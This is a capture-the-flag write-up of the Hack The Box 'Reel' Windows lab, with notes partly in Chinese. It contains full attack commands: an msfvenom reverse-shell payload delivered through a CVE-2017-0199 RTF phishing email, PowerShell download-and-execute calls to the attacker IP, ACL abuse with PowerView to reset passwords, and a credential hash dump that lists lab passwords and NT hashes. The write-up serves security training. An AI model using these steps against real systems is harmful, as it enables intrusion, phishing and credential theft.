Zumpyx Blog

Reel

Machines#143HardWindows

Recon & Enum

export IP=10.10.10.77

  • nmap -sC -A -p- --min-rate 1000 -T4 10.10.11.252
PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18  11:19PM       <DIR>          documents
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp    open  ssh          OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
|   256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_  256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp    open  smtp?
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe: 
|     220 Mail Service ready
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest: 
|     220 Mail Service ready
|     sequence of commands
|     sequence of commands
|   Hello: 
|     220 Mail Service ready
|     EHLO Invalid domain address.
|   Help: 
|     220 Mail Service ready
|     DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|   SIPOptions: 
|     220 Mail Service ready
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|   TerminalServerCookie: 
|     220 Mail Service ready
|_    sequence of commands
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: HTB)
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49159/tcp open  msrpc        Microsoft Windows RPC
...
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 2012|8|Phone|7 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 (88%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Embedded Standard 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: REEL; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
|   OS CPE: cpe:/o:microsoft:windows_server_2012::-
|   Computer name: REEL
|   NetBIOS computer name: REEL\x00
|   Domain name: HTB.LOCAL
|   Forest name: HTB.LOCAL
|   FQDN: REEL.HTB.LOCAL
|_  System time: 2024-01-15T09:28:22+00:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   3:0:2: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-01-15T09:28:26
|_  start_date: 2024-01-15T09:20:27
  • crackmapexec smb $IP -u guest -p '' --shares

Pasted+image+20240115172622.png

  • ftp 发现多个文件

Pasted+image+20240115173218.png

  • 查看文件,发现一个邮箱地址和一个提示

image-20240117092825808.png

目标接收邮件会自动转换 rft 文件,发现漏洞 CVE-2017-0199

image-20240117093045330.png

Shell as User - nico

  • 生成 Payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.18 LPORT=2233 -f hta-psh -o good.hta
python2 41894.py -M gen -t RTF -w good.rtf -u "http://10.10.16.18/good.hta"
  • 发送邮件
sendemail -f [email protected] -t [email protected] -u "It's very good" -m "How are you, nico boy." -a good.rtf -s 10.10.10.77 -v
  • 接收 Reverse Shell

image-20240117100329616.png

Shell as User - Tom

  • 在桌面上发现 cred.xml

image-20240117101140259.png

  • 尝试恢复密码 powershell -c "$Cred = Import-Clixml -Path cred.xml; $Cred.GetNetworkCredential().Password"

image-20240117102250991.png

  • ssh 登录 HTB\Tom:1ts-mag1c!!!

  • 查看 smb 共享

image-20240117104946257.png

但是没有发现有用的信息

  • 跑一下 WinPEAS,遛一下狗
[kali] $ impacket-smbserver good .
[tom] c:\> copy \\10.10.16.18\good\winPEASx64.exe winPEASx64.exe
[tom] c:\> copy \\10.10.16.18\good\SharpHound.exe SharpHound.exe
  • 组策略限制,无法运行 exe,尝试远程加载 powershell

image-20240117105928474.png

powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.16.18/winPEAS.ps1')"
powershell -c "IEX(New-Object Net.Webclient).downloadstring('http://10.10.16.18/SharpHound.ps1');Invoke-BloodHound -CollectionMethod All"
  • SharpHound.ps1 运行失败

image-20240117111957134.png

  • 在 winPEAS 中发现 nico 用户的凭据 HTB\nico:4dri@na2017!**

image-20240117132331207.png

  • C:\Users\tom\Desktop\ 发现有实现跑过的 bloodhound 记录

image-20240117112148094.png

提示没有直接通往域控的路径,需要先横向移动,另外发现关于 acl 相关的文件

  • 本地有一个 Powerview 文件,可以利用

image-20240117114029493.png

Shell as User

首先分析 acls.csv 文件,这是一个 Bloodhound 收集的信息,目前版本的 bloodhound 不兼容,导致导入失败,因此手动分析。

  • 首先筛选已有的用户

image-20240117132854896.png

image-20240117133001673.png

  • 继续再筛选添加这两个用户

image-20240117133833011.png

Backup_Adminis 组具有 WriteDacl 权限,似乎是备份管理员组,现在尝试利用

Shell as User - claire

  1. 加载 PowerView

  2. 设置 tom 为 claire ACL 的所有权限

  3. 获取 claire 重置密码的权限

Import-Module .\PowerView.ps1
Set-DomainObjectOwner -identity claire -OwnerIdentity tom -Verbose
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword -Verbose
  • 重置 claire 的密码
$NewPass = ConvertTo-SecureString 'Admin@123Admin@123' -AsPlainText -Force -Verbose
Set-DomainUserPassword -Identity claire -AccountPassword $NewPass -Verbose

image-20240117140218926.png

登录 claire 用户

image-20240117140347447.png

  • 查看用户组

image-20240117140454473.png

由于 claire 用户对 Backup_Admins 组有 WriteDacl 权限,因此可以将自己添加至该用户组

  • 添加 claire 用户到 Backup_Admins 组 net group Backup_Admins claire /add /domain

image-20240117140648932.png

Shell as Root

  • 权限和组名不太对应

image-20240117141912382.png

  • 查看一下文件权限 icacls c:\users\Administrator

image-20240117141940062.png

可以访问 administrator 目录

  • 无法访问 root.txt 但是有个 Backup Scripts 目录

image-20240117142033042.png

  • 在 BackupScript.ps1 中发现管理员密码

image-20240117142220993.png

  • 登录 Administrator:Cr4ckMeIfYouC4n!

image-20240117142315217.png

Dump Hash

  • lsassy HTB.LOCAL -u Administrator -p 'Cr4ckMeIfYouC4n!' -dc-ip $IP
[+] HTB.LOCAL HTB\tom                  [NT] 494c49c3a53e33a778f647dafac797b3 | [SHA1] 9db10cb704876ac0df5eb34853cc54e353920152
[+] HTB.LOCAL HTB\Administrator        [NT] 8b89333aa775584fdc5b5b0acdace063 | [SHA1] 58413d54bf1c8e5098e72fdfc4c8d47cc5775bc4
[+] HTB.LOCAL HTB.LOCAL\Administrator  [PWD] Cr4ckMeIfYouC4n!
[+] HTB.LOCAL HTB\nico                 [NT] cd88c7b4b819442a1e0ad041d4675aee | [SHA1] 118f938e7dbe0b6c12ba16414c8f6fc67c29fb8c
[+] HTB.LOCAL HTB\REEL$                [NT] 9fcf6992b154c8f754b5d569641fd52d | [SHA1] faaf23560d8898cb51fd3156e9a01d975a463083
[+] HTB.LOCAL HTB.LOCAL\REEL$          [PWD] 4b2f092a476efe35edb1c4b2f4c10ff3f0ccb4ce3c47fa2dbc9524eea5f37a914bcca4e1a3d0d41dfc876da61dd13e967e9e57df9f5062720ecbd554e5434b9dc4923e306fb32553557656dd67d12ae076eb110568ba76afbeac049e5298fe5fa3393169390b1c7bc12ca38d2068b106f2ba21462519c99931788cce534ad7e0852a781832571581e20735f50a7b1a3cb94a8e1701bc612bd60961268cf6eb1a178f1c90fd2531a1f3576da60dcd96ed58e8c042f7ab7485091eaca966e562f8246a05ba0d3367318c20d5ec67d78dfb29ef3b033121307e80929d7997cff51fecd0d69e38b526f4389afe096351c1c9
[+] HTB.LOCAL HTB\REEL$                [NT] f32e4ac829de6d7a0da8afe4bf952ff0 | [SHA1] 3197f99d71c2698a1215e10bd95ed6f2f0e34f93
[+] HTB.LOCAL HTB.LOCAL\REEL$          [PWD] dd31f4d28dfb15fac136c658ae3eacebb033c17884a003e6a386f3b98fa84ee8ef3cc6582bd9debb32569db14cc9e3db022b6c35fa4070bc22af280e954e5dcf365604a1fcb86bc3c91c3773ccc76450622aa4a4bd7e245771f0886713cd512cc52bb386ef62c216ad1e620bd263fb5b0476a86e925ba0a8e82ddba782e32fb2c2cc7d4a2ed79d57b022ec5972af39c3b8c0dfc85e45e64696fa751bef46f4dceac1567475013aa5aa12a8a46ae1202040722877efe16e565745f27a7aa1ba5df6ff07a9357c4856c280b2fadc17f8590dd445e00d110059ee6c041dc512db901958dce70b23b99f05fd7ebb6205f8e4